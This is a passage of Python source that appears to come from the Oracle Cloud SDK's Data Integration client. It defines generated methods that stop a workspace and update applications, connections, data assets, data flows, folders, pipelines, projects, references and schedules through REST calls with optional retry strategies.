Used to set the timeout for Data Integration to gracefully close down any running jobs before stopping the workspace.
:param bool is_force_operation: (optional)
Used to force close down the workspace.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/stop_workspace.py.html>`__ to see an example of how to use stop_workspace API.
"""
resource_path = "/workspaces/{workspaceId}/actions/stop"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"quiesce_timeout",
"is_force_operation",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"stop_workspace got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"quiesceTimeout": kwargs.get("quiesce_timeout", missing),
"isForceOperation": kwargs.get("is_force_operation", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params)
def update_application(self, workspace_id, application_key, update_application_details, **kwargs):
"""
Updates an application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param oci.data_integration.models.UpdateApplicationDetails update_application_details: (required)
The details needed to update an application.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Application`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_application.py.html>`__ to see an example of how to use update_application API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_application got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_application_details,
response_type="Application")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_application_details,
response_type="Application")
def update_connection(self, workspace_id, connection_key, update_connection_details, **kwargs):
"""
Updates a connection under a data asset.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param oci.data_integration.models.UpdateConnectionDetails update_connection_details: (required)
The information needed to update a connection.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Connection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_connection.py.html>`__ to see an example of how to use update_connection API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_connection got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_connection_details,
response_type="Connection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_connection_details,
response_type="Connection")
def update_data_asset(self, workspace_id, data_asset_key, update_data_asset_details, **kwargs):
"""
Updates a specific data asset with default connection.
:param str workspace_id: (required)
The workspace ID.
:param str data_asset_key: (required)
The data asset key.
:param oci.data_integration.models.UpdateDataAssetDetails update_data_asset_details: (required)
The information needed to update a data asset.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataAsset`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_data_asset.py.html>`__ to see an example of how to use update_data_asset API.
"""
resource_path = "/workspaces/{workspaceId}/dataAssets/{dataAssetKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataAssetKey": data_asset_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_asset_details,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_asset_details,
response_type="DataAsset")
def update_data_flow(self, workspace_id, data_flow_key, update_data_flow_details, **kwargs):
"""
Updates a specific data flow.
:param str workspace_id: (required)
The workspace ID.
:param str data_flow_key: (required)
The data flow key.
:param oci.data_integration.models.UpdateDataFlowDetails update_data_flow_details: (required)
The details needed to updated a data flow.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlow`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_data_flow.py.html>`__ to see an example of how to use update_data_flow API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlows/{dataFlowKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_data_flow got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataFlowKey": data_flow_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_flow_details,
response_type="DataFlow")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_data_flow_details,
response_type="DataFlow")
def update_external_publication(self, workspace_id, task_key, external_publications_key, update_external_publication_details, **kwargs):
"""
Updates the external publication object.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str external_publications_key: (required)
The external published object key.
:param oci.data_integration.models.UpdateExternalPublicationDetails update_external_publication_details: (required)
The information to be updated.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublication`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_external_publication.py.html>`__ to see an example of how to use update_external_publication API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublications/{externalPublicationsKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_external_publication got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key,
"externalPublicationsKey": external_publications_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_external_publication_details,
response_type="ExternalPublication")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_external_publication_details,
response_type="ExternalPublication")
def update_folder(self, workspace_id, folder_key, update_folder_details, **kwargs):
"""
Updates a specific folder.
:param str workspace_id: (required)
The workspace ID.
:param str folder_key: (required)
The folder key.
:param oci.data_integration.models.UpdateFolderDetails update_folder_details: (required)
The details needed to update a folder.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Folder`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_folder.py.html>`__ to see an example of how to use update_folder API.
"""
resource_path = "/workspaces/{workspaceId}/folders/{folderKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_folder got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"folderKey": folder_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_folder_details,
response_type="Folder")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_folder_details,
response_type="Folder")
def update_pipeline(self, workspace_id, pipeline_key, update_pipeline_details, **kwargs):
"""
Updates a specific pipeline.
:param str workspace_id: (required)
The workspace ID.
:param str pipeline_key: (required)
The pipeline key.
:param oci.data_integration.models.UpdatePipelineDetails update_pipeline_details: (required)
The details needed to updated a pipeline.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Pipeline`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_pipeline.py.html>`__ to see an example of how to use update_pipeline API.
"""
resource_path = "/workspaces/{workspaceId}/pipelines/{pipelineKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_pipeline got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"pipelineKey": pipeline_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_pipeline_details,
response_type="Pipeline")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_pipeline_details,
response_type="Pipeline")
def update_project(self, workspace_id, project_key, update_project_details, **kwargs):
"""
Updates a specific project.
:param str workspace_id: (required)
The workspace ID.
:param str project_key: (required)
The project key.
:param oci.data_integration.models.UpdateProjectDetails update_project_details: (required)
The details needed to update a project.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Project`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_project.py.html>`__ to see an example of how to use update_project API.
"""
resource_path = "/workspaces/{workspaceId}/projects/{projectKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_project got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"projectKey": project_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_project_details,
response_type="Project")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_project_details,
response_type="Project")
def update_reference(self, workspace_id, application_key, reference_key, update_reference_details, **kwargs):
"""
Updates the application references. For example, to map a data asset to a different target object.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str reference_key: (required)
The reference key.
:param oci.data_integration.models.UpdateReferenceDetails update_reference_details: (required)
The details needed to update the references.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Reference`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_reference.py.html>`__ to see an example of how to use update_reference API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/references/{referenceKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_reference got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"referenceKey": reference_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_reference_details,
response_type="Reference")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_reference_details,
response_type="Reference")
def update_schedule(self, workspace_id, application_key, schedule_key, update_schedule_details, **kwargs):
"""
Endpoint used to update the schedule
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str schedule_key: (required)
Schedule Key
:param oci.data_integration.models.UpdateScheduleDetails update_schedule_details: (required)
Request body parameter for Schedule details
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Schedule`
:rtype: :class:`~oci.response.Response`
